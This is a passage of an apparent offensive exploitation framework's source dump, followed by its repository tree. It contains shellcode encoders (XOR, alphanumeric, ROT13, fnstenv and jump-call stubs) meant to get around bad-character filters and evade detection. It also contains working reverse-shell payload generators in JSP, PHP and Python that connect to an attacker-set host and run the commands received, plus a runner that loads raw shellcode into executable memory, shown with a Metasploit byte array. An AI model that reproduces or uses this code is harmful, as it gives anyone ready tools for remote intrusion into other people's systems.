'ESP' : 'TY' + mod, # push esp, pop ecx
'EBP' : 'UY' + mod, # push ebp, pop ecx
'ESI' : 'VY' + mod, # push esi, pop ecx
'EDI' : 'WY' + mod, # push edi, pop ecx
}
reg = reg.upper()
if reg not in regprefix.keys():
raise Exception("Invalid register name")
return regprefix[reg]
def encode_byte(self, block):
# No, not nipple.
nibble_chars = [[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[]]
for ch in self.allowed_chars:
nibble_chars[ch & 0x0F].append(chr(ch))
poss_encodings = []
block_low_nibble = block[0] & 0x0F
block_high_nibble = block[0] >> 4
# Get list of chars suitable for expressing lower part of byte
first_chars = nibble_chars[block_low_nibble]
# Build a list of possible encodings
for first_char in first_chars:
first_high_nibble = ord(first_char[0]) >> 4
# In the decoding process, the low nibble of the second char gets combined
# (either ADDed or XORed depending on the encoder) with the high nibble of the first char,
# and we want the high nibble of our input byte to result
second_low_nibble = (block_high_nibble^first_high_nibble) & 0x0F
# Find valid second chars for this first char and add each combination to our possible encodings
second_chars = nibble_chars[second_low_nibble]
for second_char in second_chars:
poss_encodings.append(second_char + first_char)
if len(poss_encodings) == 0:
raise Exception("No encoding of 0x%02x possible with limited character set" % block)
return poss_encodings[randint(0, len(poss_encodings)-1)]
class XorEncoder(Encoder):
def __init__(self, disallowed_chars=(0x00, 0x0D, 0x0A)):
self._disallowed_chars = self.set_disallowed_chars(disallowed_chars)
self._usable_chars = set(range(256)) - self._disallowed_chars
def set_disallowed_chars(self, chars):
new_chars = set()
for char in chars:
new_chars.add(ord(char))
return new_chars
def _get_supported_register_sets(self):
return []
def _get_register_set(self, register_set):
return {}
def _get_header(self):
return []
def _get_payload_size_position(self):
raise NotImplementedError()
def _get_xor_key_position(self):
raise NotImplementedError()
def _encode_payload(self, payload, register_sets):
buffer = []
if isinstance(payload, types.StringTypes):
buffer.extend(ord(x) & 0xFF for x in payload)
else:
buffer.extend(payload)
for c in self._usable_chars:
ret = buffer[:]
for i in range(len(ret)):
ret[i] = ret[i] ^ c
if ret[i] in self._disallowed_chars:
# break inner for
break
else:
self._xor_key = c
# break outer for
break
else:
raise EncoderError('cannot encode')
return ret
def _prefix_header(self, payload, register_sets):
ret = self._get_header()
payload_len = 0x10000 - len(payload)
payload_size_pos = self._get_payload_size_position()
ret[payload_size_pos] = payload_len & 0xFF
ret[payload_size_pos + 1] = (
(payload_len & 0xFF00) >> 8)
xor_key_pos = self._get_xor_key_position()
for reg_set in register_sets:
for pos, value in self._get_register_set(reg_set).iteritems():
ret[pos] = value
for i, c in enumerate(ret):
if (c in self._disallowed_chars) and (
i != xor_key_pos):
# break the inner for
break
else:
# break the outter for
break
else:
raise EncoderError('cannot encode')
ret[xor_key_pos] = self._xor_key
ret.extend(payload)
return ret
def encode(self, payload, register_sets=[]):
"""Encode payload.
:param payload: the payload, either a string or a sequence of bytes
:param register_sets: a sequence of registers to try in shellcode
header. Sample names include 'eax', 'edx', and 'ebx'.
:return: a sequence of encoded bytes
"""
if len(payload) == 0:
return []
if len(payload) > 65535:
raise EncoderError('cannot encode')
if not self._usable_chars:
raise EncoderError('cannot encode')
if not register_sets:
register_sets = self._get_supported_register_sets()
encoded_payload = self._encode_payload(payload, register_sets)
ret = self._prefix_header(encoded_payload, register_sets)
return ret
def encode_to_string(self, payload, register_sets=[]):
"""Encode payload. Return a string.
:see: encode
"""
return ''.join(chr(x) for x in self.encode(payload, register_sets))
class FnstenvXorEncoder(XorEncoder):
"""Fnstenv Xor based on
http://www.metasploit.com/sc/x86_fnstenv_xor_byte.asm."""
HEADER = [
0xD9, 0xE1, # fabs
0xD9, 0x34, 0x24, # fnstenv [esp]
0x5A, # pop edx
0x5A, # pop edx
0x5A, # pop edx
0x5A, # pop edx
0x80, 0xEA, 0xE7, # sub dl,-25 (offset to payload)
0x31, 0xC9, # xor ecx,ecx
0x66, 0x81, 0xE9, 0xA1, 0xFE, # sub cx,-0x15F (0x15F is size of payload)
0x80, 0x32, 0x99, # decode: xor byte [edx],0x99
0x42, # inc edx
0xE2, 0xFA, # loop decode
# payload goes here
]
REGISTER_SET = {
'edx': {5: 0x5A, 6: 0x5A, 7: 0x5A, 8: 0x5A, 9: 0x80, 10: 0xEA,
20: 0x32, 22: 0x42},
'eax': {5: 0x58, 6: 0x58, 7: 0x58, 8: 0x58, # 9: 0x90, 10: 0x2C,
9: 0x80, 10: 0xE8,
20: 0x30, 22: 0x40},
'ebx': {5: 0x5B, 6: 0x5B, 7: 0x5B, 8: 0x5B, 9: 0x80, 10: 0xEB,
20: 0x33, 22: 0x43},
}
XOR_KEY_POSITION = 21
PAYLOAD_SIZE_POSITION = 17 # 17 and 18
def _get_supported_register_sets(self):
return FnstenvXorEncoder.REGISTER_SET.keys()
def _get_register_set(self, register_set):
return FnstenvXorEncoder.REGISTER_SET[register_set]
def _get_header(self):
return FnstenvXorEncoder.HEADER[:]
def _get_payload_size_position(self):
return FnstenvXorEncoder.PAYLOAD_SIZE_POSITION
def _get_xor_key_position(self):
return FnstenvXorEncoder.XOR_KEY_POSITION
class JumpCallXorEncoder(XorEncoder):
HEADER = [
0xeb, 0x10, # jmp getdata
0x5b, # begin: pop ebx
0x31, 0xc9, # xor ecx, ecx
0x66, 0x81, 0xe9, 0xa1, 0xfe, # sub cx, -0x15F
0x80, 0x33, 0x99, # decode: xor byte[ebx], 0x99
0x43, # inc ebx
0xe2, 0xfa, # loop decode
0xeb, 0x05, # jmp payload
0xe8, 0xeb, 0xff, 0xff, 0xff, # getdata: call begin
# payload goes here
# payload:
]
REGISTER_SET = {
'eax': {2: 0x58, 11: 0x30, 13: 0x40},
'ebx': {2: 0x5b, 11: 0x33, 13: 0x43},
'edx': {2: 0x5a, 11: 0x32, 13: 0x42},
}
XOR_KEY_POSITION = 12
PAYLOAD_SIZE_POSITION = 8
def _get_header(self):
return JumpCallXorEncoder.HEADER[:]
def _get_supported_register_sets(self):
return JumpCallXorEncoder.REGISTER_SET.keys()
def _get_register_set(self, register_set):
return JumpCallXorEncoder.REGISTER_SET[register_set]
def _get_payload_size_position(self):
return JumpCallXorEncoder.PAYLOAD_SIZE_POSITION
def _get_xor_key_position(self):
return JumpCallXorEncoder.XOR_KEY_POSITION
class CodeEncoders:
"""
Class with Encoders
"""
def __init__(self, OS_SYSTEM, OS_TARGET, OS_TARGET_ARCH, BADCHARS):
self.name = ""
self.OS_SYSTEM = OS_SYSTEM
self.OS_TARGET = OS_TARGET
self.OS_TARGET_ARCH = OS_TARGET_ARCH
self.BADCHARS = BADCHARS
self.TMP_DIR = 'tmp'
self.step = 0
self.max_steps = 20
return
def encode_shellcode(self, _byte_array, encoder_type, debug=0):
"""Encodes shellcode and returns encoded shellcode
:param encoder_type: const of EncoderType
"""
encoded_shellcode = ''
if encoder_type == Constants.EncoderType.XOR or encoder_type == 1:
encoded_shellcode = self.xor_encoder(_byte_array, debug)
elif encoder_type == Constants.EncoderType.ALPHANUMERIC:
encoded_shellcode = self.alphanum_encoder(_byte_array, debug)
elif encoder_type == Constants.EncoderType.ROT_13:
encoded_shellcode = self.rot_13_encoder(_byte_array, debug)
elif encoder_type == Constants.EncoderType.FNSTENV_XOR:
encoded_shellcode = self.fnst_encoder(_byte_array, debug)
elif encoder_type == Constants.EncoderType.JUMPCALL_XOR:
encoded_shellcode = self.jumpcall_encoder(_byte_array, debug)
else:
print "There no encoder of this type"
return None
return encoded_shellcode
def clean_bad_chars(self, orig_array, payload):
if not self.BADCHARS:
print "You must specify some params"
return None
for k in self.BADCHARS:
# Ooops, BadChar found :( Do XOR stuff again with a new random value
# This could run into an infinite loop in some cases
if k in payload:
payload = self.xor_bytes(orig_array)
return payload
def xor_bytes(self, byte_array):
# Randomize first byte
rnd = randint(1, 255)
xor1 = (rnd ^ byte_array[0])
xor2 = (xor1 ^ byte_array[1])
xor3 = (xor2 ^ byte_array[2])
xor_array = bytearray()
xor_array.append(rnd)
xor_array.append(xor1)
xor_array.append(xor2)
xor_array.append(xor3)
return self.clean_bad_chars(byte_array, xor_array)
def xor_decoder(self, _shellcode, debug=0):
"""
The decoder stub is a small chunk of instructions
that is prepended to the encoded payload.
When this new payload is executed on the target system,
the decoder stub executes first and is responsible for
decoding the original payload data. Once the original
payload data is decoded, the decoder stub passes execution
to the original payload. Decoder stubs generally perform a
reversal of the encoding function, or in the case of an XOR
obfuscation encoding, simply perform the XOR again against
the same key value.
"""
asm_code = """
global _start
section .text
_start:
jmp get_shellcode
decoder:
pop esi ;pointer to shellcode
push esi ;save address of shellcode for later execution
mov edi, esi ;copy address of shellcode to edi to work with it
xor eax, eax ;clear first XOR-operand register
xor ebx, ebx ;clear second XOR-operand register
xor ecx, ecx ;clear inner loop-counter
xor edx, edx ;clear outer loop-counter
loop0:
mov al, [esi] ;get first byte from the encoded shellcode
mov bl, [esi+1] ;get second byte from the encoded shellcode
xor al, bl ;xor them (result is saved to eax)
mov [edi], al ;save (decode) to the same memory location as the encoded shellcode
inc edi ;move decoded-pointer 1 byte onward
inc esi ;move encoded-pointer 1 byte onward
inc ecx ;increment inner loop-counter
cmp cl, 0x3 ;dealing with 4byte-blocks!
jne loop0
inc esi ;move encoded-pointer 1 byte onward
xor ecx, ecx ;clear inner loop-counter
add dx, 0x4 ;move outer loop-counter 4 bytes onward
cmp dx, len ;check whether the end of the shellcode is reached
jne loop0
call [esp] ;execute decoded shellcode
get_shellcode:
call decoder
shellcode: db USER_SHELLCODE
len: equ $-shellcode
"""
asm_code = asm_code.replace('USER_SHELLCODE', _shellcode)
encoded_shellcode, _ = create_shellcode(asm_code, self.OS_TARGET, self.OS_TARGET_ARCH, debug=debug)
return encoded_shellcode
def xor_encoder(self, _byte_arr, debug=0):
self.step += 1
"""
Simple xor encoder
https://www.rcesecurity.com/2015/01/slae-custom-rbix-shellcode-encoder-decoder/
"""
shellcode = bytearray(_byte_arr)
# Check whether shellcode is aligned
if len(shellcode) % 3 == 1:
shellcode.append(0x90)
shellcode.append(0x90)
elif len(shellcode) % 3 == 2:
shellcode.append(0x90)
# Loop to split shellcode into 3-byte-blocks
final = ""
for i in range(0, len(shellcode), 3):
tmp_block = bytearray()
tmp_block.append(shellcode[i])
tmp_block.append(shellcode[i + 1])
tmp_block.append(shellcode[i + 2])
# Do the RND-Insertion and chained XORs
tmp = self.xor_bytes(tmp_block)
# Some formatting things for easier use in NASM :)
for y in tmp:
if len(str(hex(y))) == 3:
final += str(hex(y)[:2]) + "0" + str(hex(y)[2:]) + ","
else:
final += hex(y) + ","
final = final[:-1]
encoded_shellcode = self.xor_decoder(final, debug)
for i in self.BADCHARS:
if i in encoded_shellcode:
print("Founding BADHCARS")
if self.step < self.max_steps:
return self.xor_encoder(_byte_arr, debug)
else:
return None
return encoded_shellcode
def rot_13_decoder(self, _shellcode, debug=0):
"""
The decoder stub
"""
n = 13
n_hex = hex(n)
asm_code = """
global _start
section .text
_start:
jmp short call_decoder
decoder:
pop esi ; shellcode address
xor ecx, ecx ; zero out ecx
mov cl, len ; initialize counter
decode:
cmp byte [esi], %s ; can we substract 13?
jl wrap_around ; nope, we need to wrap around
sub byte [esi], %s ; substract 13
jmp short process_shellcode ; process the rest of the shellcode
wrap_around:
xor edx, edx ; zero out edx
mov dl, %s ; edx = 13
sub dl, byte [esi] ; 13 - shellcode byte value
xor ebx,ebx ; zero out ebx
mov bl, 0xff ; store 0x100 without introducing null bytes
inc ebx
sub bx, dx ; 256 - (13 - shellcode byte value)
mov byte [esi], bl ; write decoded value
process_shellcode:
inc esi ; move to the next byte
loop decode ; decode current byte
jmp short shellcode ; execute decoded shellcode
call_decoder:
call decoder
shellcode:
db USER_SHELLCODE
len: equ $-shellcode
""" % (n_hex, n_hex, n_hex)
asm_code = asm_code.replace('USER_SHELLCODE', _shellcode)
encoded_shellcode, _ = create_shellcode(asm_code, self.OS_TARGET, self.OS_TARGET_ARCH, debug=debug)
return encoded_shellcode
def rot_13_encoder(self, _shellcode, debug=0):
"""
ROT13 ("rotate by 13 places", sometimes hyphenated ROT-13)
is a simple letter substitution cipher that replaces a letter
with the letter 13 letters after it in the alphabet. ROT13
is a special case of the Caesar cipher, developed in ancient Rome.
"""
n = 13 # rot-n
max_value_without_wrapping = 256 - n
encoded_shellcode = ""
db_shellcode = []
for x in bytearray(_shellcode):
if x < max_value_without_wrapping:
encoded_shellcode += '\\x%02x' % (x + n)
db_shellcode.append('0x%02x' % (x + n))
else:
encoded_shellcode += '\\x%02x' % (n - 256 + x)
db_shellcode.append('0x%02x' % (n - 256 + x))
# print "Encoded shellcode:\n%s\n" % encoded_shellcode
# print "DB formatted (paste in .nasm file):\n%s\n" % ','.join(db_shellcode)
encode_shellcode = self.rot_13_decoder(','.join(db_shellcode), debug)
return encode_shellcode
def fnst_encoder(self, _byte_array, debug):
encoder = FnstenvXorEncoder(self.BADCHARS)
shellcode = _byte_array
encoded_shell = encoder.encode_to_string(shellcode)
if debug:
print "Len of encoded shellcode:", len(encoded_shell)
return encoded_shell
def jumpcall_encoder(self, _byte_array, debug):
encoder = JumpCallXorEncoder(self.BADCHARS)
shellcode = _byte_array
encoded_shell = encoder.encode_to_string(shellcode)
if debug:
print "Len of encoded shellcode:", len(encoded_shell)
return encoded_shell
def alphanum_encoder(self, byte_str, debug=0, buffer_register='ecx'):
encoder = AlphanumericEncoder(self.BADCHARS, buffer_register=buffer_register)
encoded_shell = encoder.encode(byte_str)
if debug:
print("Length of encoded shellcode: %s" % len(encoded_shell))
print ''.join("\\x%02x"%ord(c) for c in encoded_shell)
return encoded_shell
================================================
FILE: shellcodes/JavaShellcode.py
================================================
import os
from shellcode import Shellcode
from core.helpers.archieve.jar import Jar
from ShellUtils import Constants, read_binary
class JavaShellcodes(Shellcode):
"""
Class with shellcodes for java language
"""
def __init__(self, connectback_ip='localhost', connectback_port=5555,
badchars=['\x00'], type = Constants.JavaShellcodeType.JAR, make_jar=False):
Shellcode.__init__(self, connectback_ip=connectback_ip, connectback_port=connectback_port, badchars=badchars)
self.type = type
self.make_jar = make_jar
self.path_to_jar = ""
return
def get_jsp(self, inline=False):
""" Function to get java(jsp) shellcode """
if not self.CONNECTBACK_IP or not self.CONNECTBACK_PORT:
print "Settings for connectback listener must be defined"
return False
javacode = ""
javacode += """
<%@page import="java.lang.*, java.util.*, java.io.*, java.net.*"%>
<%class StreamConnector extends Thread {
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os ) {
this.is = is;
this.os = os;
}
public void run() {
BufferedReader in = null;
BufferedWriter out = null;
try {
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) {
out.write( buffer, 0, length ); out.flush();
}
} catch( Exception e ){
}
try {
if( in != null ) in.close();
if( out != null ) out.close();
} catch( Exception e ){}
}
}
try {
String OS = System.getProperty("os.name").toLowerCase();
Socket socket = new Socket( "LOCALHOST", LOCALPORT );
String command = "cmd.exe";
if (OS.indexOf("win") < 0)
command = "/bin/sh";
Process process = Runtime.getRuntime().exec(command);
(new StreamConnector(process.getInputStream(),socket.getOutputStream())).start();
(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
} catch( Exception e ) {
}
%>"""
javacode = javacode.replace("LOCALHOST", str(self.CONNECTBACK_IP))
javacode = javacode.replace("LOCALPORT", str(self.CONNECTBACK_PORT))
if inline:
javacode = self.make_inline(javacode)
return javacode
def get_jar(self, filename=""):
if not os.path.exists('temp'):
os.makedirs("temp")
filepath = 'temp/%s' % (filename or "payload.jar")
jar = Jar(filepath)
data = "{host};{port}".format(host=self.CONNECTBACK_IP, port=self.CONNECTBACK_PORT)
jar.add_file('east/data.dat', data)
path = os.getcwd() + '/shellcodes/data/java/reverse_tcp/Payload.class'
jar.add_file('east/Payload.class', read_binary(path))
if self.make_jar:
self.path_to_jar = filepath
remove_jar = not self.make_jar
return jar.get_raw(remove_jar)
def get_shellcode(self, inline=False):
if not hasattr(Constants.JavaShellcodeType, self.type.upper()):
raise Exception("There no Java payload of this type.")
shell = ""
if self.type == Constants.JavaShellcodeType.JAR:
shell = self.get_jar()
elif self.type == Constants.JavaShellcodeType.JSP:
shell = self.get_jsp(inline)
return shell
================================================
FILE: shellcodes/PhpShellcode.py
================================================
from shellcode import Shellcode
class PhpShellcodes(Shellcode):
"""
Class with shellcodes for php language
"""
def __init__(self, connectback_ip='localhost', connectback_port=5555):
Shellcode.__init__(self, connectback_ip=connectback_ip, connectback_port=connectback_port)
self.name = ""
return
def get_phpinfo(self, badchars):
""" Function to get phpinfo """
phpcode = "<?php phpinfo(); ?>"
return phpcode
def get_phpcode(self, localhost, localport):
""" Function to get php shellcode """
if not localhost or not localport:
print "Settings for connectback listener must be defined"
return False
phpcode = ""
phpcode += """
<?php
$address="LOCALHOST";
$port=LOCALPORT;
$buff_size=2048;
$timeout=120;
$sock=fsockopen($address,$port) or die("Cannot create a socket");
while ($read=fgets($sock,$buff_size)) {
$out="";
if ($read) {
if (strcmp($read,"quit")===0 || strcmp($read,"q")===0) {
break;
}
ob_start();
passthru($read);
$out=ob_get_contents();
ob_end_clean();
}
$length=strlen($out);
while (1) {
$sent=fwrite($sock,$out,$length);
if ($sent===false) {
break;
}
if ($sent<$length) {
$st=substr($st,$sent);
$length-=$sent;
} else {
break;
}
}
}
fclose($sock);
?>
"""
phpcode = phpcode.replace("LOCALHOST", str(localhost))
phpcode = phpcode.replace("LOCALPORT", str(localport))
return phpcode
def get_php_code_inline(self, host, port):
res = self.get_phpcode(host, port)
res = res.replace('\n', '')
res = res.replace('\r', '')
return res
def get_shellcode(self, inline=False):
shell = self.get_phpcode(self.CONNECTBACK_IP, self.CONNECTBACK_PORT)
if inline:
shell = self.make_inline(shell)
return shell
================================================
FILE: shellcodes/PythonShellcode.py
================================================
from shellcode import Shellcode
class PythonShellcodes(Shellcode):
"""
Class with shellcodes for python language
"""
def __init__(self, connectback_ip='localhost', connectback_port=5555):
Shellcode.__init__(self, connectback_ip=connectback_ip, connectback_port=connectback_port)
self.name = ""
return
def get_python_code(self, badchars, localhost, localport):
"""
Function to get python shellcode
"""
if not localhost or not localport:
print "Settings for connectback listener must be defined"
return False
pythoncode = ""
pythoncode += """
#!/usr/bin/python
import socket,subprocess
HOST = 'LOCALHOST' # The remote host
PORT = LOCALPORT # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to attacker machine
s.connect((HOST, PORT))
# send we are connected
s.send('[*] Connection Established!')
# start loop
while 1:
# recieve shell command
data = s.recv(1024)
print data
# if its quit, then break out and close socket
if data == 'quit' or data == 'q':
break
# do shell command
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# read output
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
s.send(stdout_value)
# close socket
s.close()
"""
pythoncode = pythoncode.replace("LOCALHOST", str(localhost))
pythoncode = pythoncode.replace("LOCALPORT", str(localport))
return pythoncode
def get_shellcode(self, inline=False):
shell = self.get_python_code(self.BADCHARS, self.CONNECTBACK_IP, self.CONNECTBACK_PORT)
if inline:
shell = self.make_inline(shell)
return shell
================================================
FILE: shellcodes/README
================================================
Generate shellcodes are tested on:
1. WIN 32bit XP SP2
2. WIN 32bit 7 Ultimate
3. Linux 3.13.0-57-generic Ubuntu x86_64 x86_64 x86_64 GNU/Linux
================================================
FILE: shellcodes/Runshellcode.py
================================================
#!/usr/bin/python
import ctypes
from Encoders import *
from Shellcodes import *
from ast import literal_eval
from ShellUtils import Constants
class RunShellcode():
def run(self, shellcode_string, platform, encoder=''):
if encoder:
BADCHARS = ["\x00", "\x0a", "\x0d"]
new_encoder = CodeEncoders(platform, platform, Constants.OS_ARCH.X32, BADCHARS)
if encoder == Constants.EncoderType.XOR:
shellcode_string = new_encoder.xor_encoder(shellcode_string, debug=1)
elif encoder == Constants.EncoderType.ALPHANUMERIC:
shellcode_string = new_encoder.alphanum_encoder(shellcode_string, debug=1)
if platform == Constants.OS.WINDOWS:
shellcode = bytearray(shellcode_string)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
elif platform == Constants.OS.LINUX:
shellcode = ctypes.c_char_p(shellcode_string)
function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))
addr = ctypes.cast(function, ctypes.c_void_p).value
libc = ctypes.CDLL('libc.so.6')
pagesize = libc.getpagesize()
addr_page = (addr // pagesize) * pagesize
for page_start in range(addr_page, addr + len(shellcode_string), pagesize):
assert libc.mprotect(page_start, pagesize, 0x7) == 0
function()
else:
print("Unknown platform")
return
if __name__ == "__main__":
#x86/shikata_ga_nai succeeded with size 227 (iteration=1)
#Metasploit windows/exec calc.exe
shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68"
"\x02\x00\x0f\xa0\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
# Linux x86 test shellcode
# ("\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
# "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x10\x00\x00\x00\x2f"
# "\x75\x73\x72\x2f\x62\x69\x6e\x2f\x77\x68\x6f\x61\x6d\x69\x00"
# "\x57\x53\x89\xe1\xcd\x80");
rsc = RunShellcode()
rsc.run(shellcode, Constants.OS.WINDOWS, None)
================================================
FILE: shellcodes/ShellUtils.py
================================================
import os
import time
from subprocess import call, Popen, PIPE
from shutil import rmtree
from platform import system, machine
import struct
TIMESTAMP = time.strftime('%Y%m%d%H%M%S', time.gmtime())
OS_SYSTEM = system().upper()
OS_ARCH = machine()
class Constants:
FW_ROOT_PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
SHELLCODES_DEV_PATH = os.path.join(FW_ROOT_PATH, '3rdPartyTools', 'ShellcodesUtils')
TMP_DIR = os.path.join(FW_ROOT_PATH, 'tmp')
class OS:
WINDOWS = "WINDOWS"
LINUX = "LINUX"
class OS_ARCH:
X32 = "32bit"
X64 = "64bit"
class EncoderType:
XOR = "xor"
ALPHANUMERIC = "alphanum"
ROT_13 = "rot_13"
FNSTENV_XOR = "fnstenv"
JUMPCALL_XOR = "jumpcall"
class ShellcodeType:
JSP = "jsp"
JAR = "jar"
PYTHON = "python"
PHP = "php"
ASPX = "aspx"
class JavaShellcodeType:
JSP = "jsp"
JAR = "jar"
class ShellcodeConnection:
BIND = 'bind'
REVERSE = 'reverse'
def is_os_64bit():
return machine().endswith('64')
def search_file(filename, search_path):
"""
Given a search path, find file
"""
path = os.path.join(search_path, filename)
if os.path.exists(path):
return path
return None
def write_file(data, file_ext='', file_name=''):
"""
Function to create file
"""
if not os.path.exists(Constants.TMP_DIR):
os.makedirs(Constants.TMP_DIR)
if not file_ext.startswith('.'):
file_ext = '.' + file_ext
if not file_name:
file_name = TIMESTAMP
file_name += file_ext
file_path = os.path.join(Constants.TMP_DIR, file_name)
fd = open(file_path, 'wb+')
fd.write(data)
fd.close()
return file_path
def get_objective_code(asm_file, target_arch, debug=0):
"""
Get objective code (file: *.o)
"""
output_format = ""
if target_arch == Constants.OS_ARCH.X32:
output_format = 'elf'
elif target_arch == Constants.OS_ARCH.X64:
output_format = 'elf64'
else:
print ("Format for output objective file is not defined")
return None
if not asm_file:
print ("You must specify some params passed to function")
return None
obj_file = (asm_file.split('.'))[0] + ".o"
app = 'nasm' # Application that do magic for us
if OS_SYSTEM == Constants.OS.WINDOWS:
app += '.exe'
find_app = search_file("%s" % app, Constants.SHELLCODES_DEV_PATH)
if find_app:
if debug:
print ("app: '%s' found at %s" % (app, find_app))
else:
print ("You must install app: '%s' and maybe edit environment variables path to it" % app)
return None
elif OS_SYSTEM == Constants.OS.LINUX:
find_app = app
else:
print ("Can't understand source os")
return None
command = "%s -f%s -o%s %s" % (find_app, output_format, obj_file, asm_file)
if debug:
print (command)
res = call([find_app, "-f", output_format, "-o", obj_file, asm_file])
if res == 0:
if debug:
print("Objective code has been created")
return obj_file
else:
print ("Something wrong while getting objec
gitextract_2b2nupye/
├── .gitignore
├── 3rdParty/
│ ├── ef_armo_pack_demo/
│ │ ├── LICENSE.txt
│ │ └── changelog.txt
│ ├── ef_scada_pack_demo/
│ │ ├── LICENSE.txt
│ │ └── changelog.txt
│ └── readme.txt
├── Documentation/
│ └── TD.docx
├── README.md
├── core/
│ ├── BruteForcer.py
│ ├── Commands.py
│ ├── DirectoryTraversal.py
│ ├── Modules.py
│ ├── OptionsParser.py
│ ├── PortScannerMT.py
│ ├── ReportGenerator.py
│ ├── ServiceMessagesHandler.py
│ ├── Sploit.py
│ ├── WebHelper.py
│ ├── WebSocketServer.py
│ ├── __init__.py
│ ├── helpers/
│ │ ├── __init__.py
│ │ ├── archieve/
│ │ │ ├── __init__.py
│ │ │ ├── jar.py
│ │ │ └── zip.py
│ │ └── java/
│ │ ├── Serialization.py
│ │ └── __init__.py
│ └── passwords.txt
├── data/
│ ├── CVE-2015-8103/
│ │ ├── serialized_class_loader
│ │ ├── serialized_file_writer
│ │ ├── serialized_jenkins_header
│ │ ├── serialized_payload_footer
│ │ └── serialized_payload_header
│ └── report_templates/
│ ├── common.html
│ └── row_template.html
├── docs/
│ ├── files/
│ │ ├── template.py
│ │ └── vulnserver_bof/
│ │ └── vulnserver_buffer_overflow.py
│ └── index.html
├── help/
│ └── README.txt
├── listener/
│ ├── __init__.py
│ ├── bind_connector.py
│ └── listener.py
├── shellcodes/
│ ├── Asm.py
│ ├── DotNetShellcode.py
│ ├── Encoders.py
│ ├── JavaShellcode.py
│ ├── PhpShellcode.py
│ ├── PythonShellcode.py
│ ├── README
│ ├── Runshellcode.py
│ ├── ShellUtils.py
│ ├── ShellcodeGenerator.py
│ ├── Shellcodes.py
│ ├── __init__.py
│ ├── data/
│ │ ├── java/
│ │ │ └── src/
│ │ │ └── ReverseTCP/
│ │ │ └── Payload.java
│ │ ├── linux/
│ │ │ ├── src/
│ │ │ │ ├── bind_tcp.asm
│ │ │ │ └── reverse_tcp.asm
│ │ │ └── x64/
│ │ │ └── src/
│ │ │ ├── bind_tcp.asm
│ │ │ └── reverse_tcp.asm
│ │ └── windows/
│ │ ├── src/
│ │ │ ├── bind_tcp.asm
│ │ │ └── reverse_tcp.asm
│ │ └── x64/
│ │ └── src/
│ │ ├── bind_tcp.asm
│ │ └── reverse_tcp.asm
│ ├── shellcode.py
│ └── shellcode_payload.py
├── start.py
└── ui/
├── __init__.py
├── css/
│ ├── codemirror.css
│ └── main.css
├── httpd.py
├── index.html
├── index.jade
├── js/
│ ├── codemirror.js
│ ├── components.js
│ ├── guiCommands.js
│ ├── main.js
│ ├── rsvp.js
│ ├── serverCommands.js
│ └── ws.js
└── mode/
└── python/
├── index.html
└── python.js
SYMBOL INDEX (863 symbols across 39 files)
FILE: core/BruteForcer.py
